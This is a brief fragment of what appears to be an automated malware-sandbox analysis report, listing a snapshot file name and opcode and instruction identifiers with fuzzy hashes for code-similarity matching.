                                                                                            • Snapshot File: hcaresult_13_2_10bd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction ID: 506273fc007f28dfddb54e271b2c15f280ad5d53a4e85b378a8d3afb451926cf
                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction Fuzzy Hash: 5411D075504244DFDB12CF54C5C4B55FFA1FB44318F24CAA9E9894B256C33AD44ACF51